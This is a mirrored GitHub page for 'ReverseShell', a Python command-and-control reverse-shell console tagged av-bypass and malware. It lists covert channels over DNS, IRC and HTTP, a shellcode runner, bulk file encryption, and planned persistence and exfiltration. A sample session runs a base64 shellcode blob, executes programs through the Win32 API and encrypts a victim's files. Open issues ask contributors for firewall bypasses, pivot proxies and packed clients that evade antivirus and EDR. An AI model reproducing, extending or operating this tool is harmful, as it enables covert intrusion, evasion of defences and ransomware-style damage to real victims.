Giter Site home page Giter Site logo

mauricelambert / reverseshell Goto Github PK

View Code? Open in Web Editor NEW
4.0 1.0 2.0 98 KB

This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).

License: GNU General Public License v3.0

Python 97.82% Shell 2.18%
dns http irc pypi-package python3 reverse-shell tcp udp console netcat terminal av-bypass c2 command-and-control cryptolocker malware

reverseshell's Introduction

ReverseShell logo

ReverseShell

Description

This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).

Version 0.0.X - POC

  • Support basic reverse shell using netcat or other standard/basic reverse shell
  • Basic terminal features
  • Commands history
  • UDP
  • Multi-sessions TCP (1 session/1 command)
  • Encrypt TCP data with SSL
  • Encrypt commands with RC4
  • Hide commands with IRC protocol
  • Hide commands with DNS (UDP) protocol
  • Hide commands with HTTP protocol
  • Advanced terminal features (required specific packets):
    • Print colored hostname, user and current directory
    • Auto-completion (executables in PATH and files in current directory)
    • Updatable any time you send the specific packet
  • Auto-restart for TCP client
  • Very large TCP packet (greater than TCP Window) is working
  • Check if command exists (only with advanced reverse shell features)

Version 0.1.X - Dev

  • Builtins command
    • Update environment
      • Current directory
      • Files/Executables
      • Encryption key
      • Compression algorithm
        • Gzip, Lzma, Bz2, Zlib
      • Data encoding
        • Bases: 16, 32, 64 85
    • Upload and download file (optional compression)
    • Download file from URL
    • Code execution (for the python POC it's a python execution) (optional compression)
    • Shellcode runner (optional compression)
    • Single/Multiple file(s) encryption/decryption with parallelism (multi-processing) (multiple encryption support glob syntax)
    • Archive files (useful to download mutliples files with only one command)
    • Call DLL or shared object functions (for example to use Win32 API)
  • Update encryption key with random value
    • New encryption is based on the precedent encryption, without all of the precedents keys you can't decrypt data

Version 1.0.X - TODO

  • Auto install (in memory and/or saved on the disk)
    • From basic reverse shell
    • From protocols
      • WMI (impacket plugin ?)
      • SMB (impacket plugin ?)
  • Persistence
  • Data exfiltration
  • Saved hidden payloads (for examples in Windows logs or registry)
  • Spawn TTY for Linux
  • Download multiples files on another temp socket (for parallelism, useful to export lot of data)
  • Waiting to execute command after receive it (using Beep, socket timeout, Sleep, child process, async worker or thread end, print)
  • Thread instead of process

Examples

You can read multiples POC for reverse shell client written in python in the clients directory.

I add public and private key for default SSL certificate, is useful for test but is not secure, create your own certificate to protect your TCP data.

Requirements

This package require :

  • python3
  • python3 Standard Library
  • PythonToolsKit

Installation

pip install ReverseShell

Usages

Command lines

python3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k "abcd" # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.

Python3

from ReverseShell import ReverseShellSocketTcp, ReverseShell

with ReverseShellSocketTcp(address=("127.0.0.1", 1337), ssl=False, cert=None, key=None, handler=ReverseShell) as shellserver:
    shellserver.serve_forever()

# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.

from ReverseShell import ReverseShellTcp, HttpReverseShell, partial

with ReverseShellTcp(address=("127.0.0.1", 1337), ssl=True, cert="server.crt", key="server.key", handler=partial(HttpReverseShell, key=b"abcd", encoding="utf-8")) as shellserver:
    shellserver.serve_forever()

# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.

ReverseShell builtins commands

WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ update_environment
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$

Screenshots

ReverseShell

Contributions

You are welcome to contribute ! Beginner, intermediate and advanced developpers can contribute to this repository. Python developpers, system administrators, network administrators, web developpers and compiled language developpers can contribute. See the issues to know what we need.

Links

Help

usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
                       [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]

Advanced reverse shell console.

options:
  -h, --help            show this help message and exit
  --udp, -u             Use UDP socket.
  --tcp, -t             Use TCP socket.
  --multi-tcp, -T       Create TCP socket for each command and responses.
  --http, -H            Use HTTP requests and responses.
  --dns, -d             Use DNS requests and responses.
  --irc, -I             Use IRC requests and response.
  --no-color, --color, -C
                        Do not use color
  --key KEY, -k KEY     Add a key to encrypt with RC4.
  --cert CERT, -c CERT  SSL cert file.
  --private PRIVATE, -P PRIVATE
                        SSL private key file.
  --ip IP, -i IP        IP address to start the ReverseShell server.
  --port PORT, -p PORT  UDP/TCP port to start the ReverseShell server.
  --encoding ENCODING, -e ENCODING
                        The reverse shell encoding used by client.
  --ssl, -s             Use SSL over TCP socket.
  --no-timeout, -m      Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
                        reverse shell like netcat.

Licence

Licensed under the GPL, version 3.

reverseshell's People

Contributors

mauricelambert avatar

Stargazers

avatar avatar avatar avatar

Watchers

avatar

Forkers

rootkit7 koushui

reverseshell's Issues

[Python/network advanced contribution] Implements others commons protocols

To bypass firewall we need to use valid packets for authorized protocols and authorized protocols are not the same for all servers. There are many commons protocols (used on servers in the production environment) that can be useful to bypass firewall:

  • NTP (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • NRPE (take examples on HTTP, DNS and IRC implementations and use documentations to define how you can sent commands and responses and how you should implements the protocol)
  • SNMP (take examples on HTTP, DNS and IRC implementations and use the RFC version 1, version 2, version 3 to define how you can sent commands and responses and how you should implements the protocol)
  • LDAP (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • FTP (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • SSH (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • SMB (take examples on HTTP, DNS and IRC implementations and use the documentation to define how you can sent commands and responses and how you should implements the protocol)
  • SMTP (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • DNS over TCP (take examples on HTTP, DNS and IRC implementations and use the RFC to define how you can sent commands and responses and how you should implements the protocol)
  • DNS over TLS (take examples on HTTP, DNS and IRC implementations and use the RFC
  • DNS over HTTPS (take examples on HTTP, DNS and IRC implementations and use the RFC

[Network contribution] Implements a "proxy" for reverse shell

Some times we can't established communication between target's servers and your own computer, but it's possible to spawn a reverse shell on other server than have access to the target's servers. So the easiest way to spawn a reverse shell on the target and control it from your computer is a "proxy" reverse shell. We probably need to implements this "proxy" with multiple incoming protocols (to bypass the first firewall) and multiple outbound protocols (to bypass a second firewall), so the "proxy" should "translate" packets (the command in the content) from a protocol to another protocol.

[Python beginner contribution] Implements new python clients

Python beginner are welcome to contribute developing new reverse shell clients:

  • IRC reverse shell client with advanced functions, ssl and RC4 encryption (there is an example with HTTP here and there is basic IRC reverse shell here).
  • DNS reverse shell client with advanced functions and RC4 encryption (there is an example with HTTP here and there is basic DNS reverse shell here).

[Compiled contribution] Implements reverse shell clients for all systems

We need to spawn a reverse shell on many different systems like: Windows, Linux, BSD and minimal/hardened systems or containers. To use a reverse shell on theses different systems it's necessary to implements clients reverse shell in many compiled languages (to have different signatures and use different packers to bypass antivirus and EDR).

  • C/C++
  • Go
  • Rust
  • dotnet (C# or F#)
  • Java
  • Nim
  • Pony

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.